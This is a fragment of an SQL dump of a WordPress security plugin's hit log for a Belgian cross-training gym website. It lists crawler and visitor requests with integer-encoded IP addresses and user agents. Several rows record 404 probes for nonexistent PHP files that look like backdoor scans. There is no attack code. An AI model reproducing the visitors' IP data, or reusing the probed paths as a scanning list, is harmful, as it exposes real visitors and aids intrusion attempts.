(75542, 1497759226.565066, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75543, 1497761388.217248, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/41.0.2272.118 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75544, 1497763980.719584, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(75545, 1497770953.766045, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(75546, 1497770954.298162, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75547, 1497770955.029792, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75548, 1497770955.675906, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75549, 1497770956.490958, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75550, 1497770956.994631, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75551, 1497770957.389567, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75552, 1497770957.833173, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75553, 1497770958.230971, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75554, 1497770958.647309, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75555, 1497770959.062389, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75556, 1497770959.526861, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75557, 1497770959.920071, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75558, 1497770960.503018, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75559, 1497771858.636349, 1371104126, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.google.fr/', 'Mozilla/5.0 (Linux; Android 6.0; NEM-L51 Build/HONORNEM-L51) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75560, 1497771862.688297, 1371104126, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Linux; Android 6.0; NEM-L51 Build/HONORNEM-L51) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75561, 1497771966.646577, 1538361201, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75562, 1497771968.305866, 1538361201, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75563, 1497772025.124413, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75564, 1497772028.040994, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75565, 1497772034.548363, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75566, 1497772152.421527, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75567, 1497772166.608049, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75568, 1497772174.685162, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75569, 1497772189.531717, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75570, 1497772190.798078, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75571, 1497772196.918399, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75572, 1497775936.194385, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/rss_feeder.class.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/rss_feeder.class.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75573, 1497778208.240737, 872366385, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75574, 1497778227.953889, 1405240484, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.fr/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75575, 1497778229.240779, 1405240484, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75576, 1497784963.598396, 1568498493, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-forms-ajax.php', 'http://crosstrainingcenter.be/wp-forms-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75577, 1497792496.609073, 2509962199, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(75578, 1497796517.708893, 3475901815, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75579, 1497798272.329446, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75580, 1497798272.782244, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75581, 1497799079.602568, 621928491, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/three-column-screen-layout/db.php', 'http://crosstrainingcenter.be/wp-content/plugins/three-column-screen-layout/db.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75582, 1497799106.131502, 1540872244, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/framework.php', 'http://crosstrainingcenter.be/framework.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75583, 1497800155.260640, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(75584, 1497800156.780882, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75585, 1497800157.624813, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75586, 1497800159.075994, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75587, 1497800159.591988, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75588, 1497800160.003330, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75589, 1497800160.454268, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75590, 1497800161.711740, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75591, 1497800162.344510, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75592, 1497800163.048227, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75593, 1497800163.799855, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75594, 1497800164.291544, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75595, 1497800164.735867, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75596, 1497800165.156574, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75597, 1497800174.736085, 1475494039, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/content-wrapper.php', 'http://crosstrainingcenter.be/content-wrapper.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75598, 1497800899.744868, 3475901899, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75599, 1497801828.035889, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75600, 1497801832.540106, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75601, 1497801842.133359, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75602, 1497801856.817384, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75603, 1497801860.966327, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75604, 1497801870.584478, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75605, 1497801875.403037, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75606, 1497801880.234765, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75607, 1497802442.833884, 1538629115, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0; T08 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 OPR/42.7.2246.114996'),
(75608, 1497803154.951769, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/framework.php', 'http://crosstrainingcenter.be/framework.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75609, 1497804105.058474, 1463838565, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75610, 1497804982.099720, 3475901815, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75611, 1497808633.911898, 1297196331, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-form-ajax.php', 'http://crosstrainingcenter.be/wp-form-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75612, 1497810668.362994, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(75613, 1497810668.857294, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75614, 1497810669.484298, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75615, 1497810670.062894, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75616, 1497810670.699316, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75617, 1497810671.323001, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75618, 1497810671.851989, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75619, 1497810672.560853, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75620, 1497810673.032222, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75621, 1497810673.475959, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75622, 1497810673.923747, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75623, 1497810674.397150, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75624, 1497810674.803818, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75625, 1497810675.211066, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75626, 1497810840.431818, 1838045613, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75627, 1497810840.949692, 1838045613, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75628, 1497810841.408957, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75629, 1497810841.863276, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75630, 1497810842.333274, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75631, 1497810842.775297, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75632, 1497810843.370618, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75633, 1497810843.813114, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75634, 1497810844.327466, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75635, 1497810844.758181, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75636, 1497810845.214124, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75637, 1497813978.585388, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75638, 1497819429.902275, 3475901731, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75639, 1497819430.556793, 3475901731, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75640, 1497819431.141433, 3475901731, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75641, 1497820032.336400, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75642, 1497824612.540854, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75643, 1497827389.328315, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75644, 1497827390.231555, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75645, 1497827684.235364, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75646, 1497828103.665225, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(75647, 1497828104.107019, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(75648, 1497834854.785685, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75649, 1497838499.574444, 846466161, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/b.php', 'http://crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/b.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75650, 1497844710.219040, 2637637391, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75651, 1497845793.034456, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75652, 1497852014.473563, 3024883481, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75653, 1497853124.340462, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75654, 1497853424.969408, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
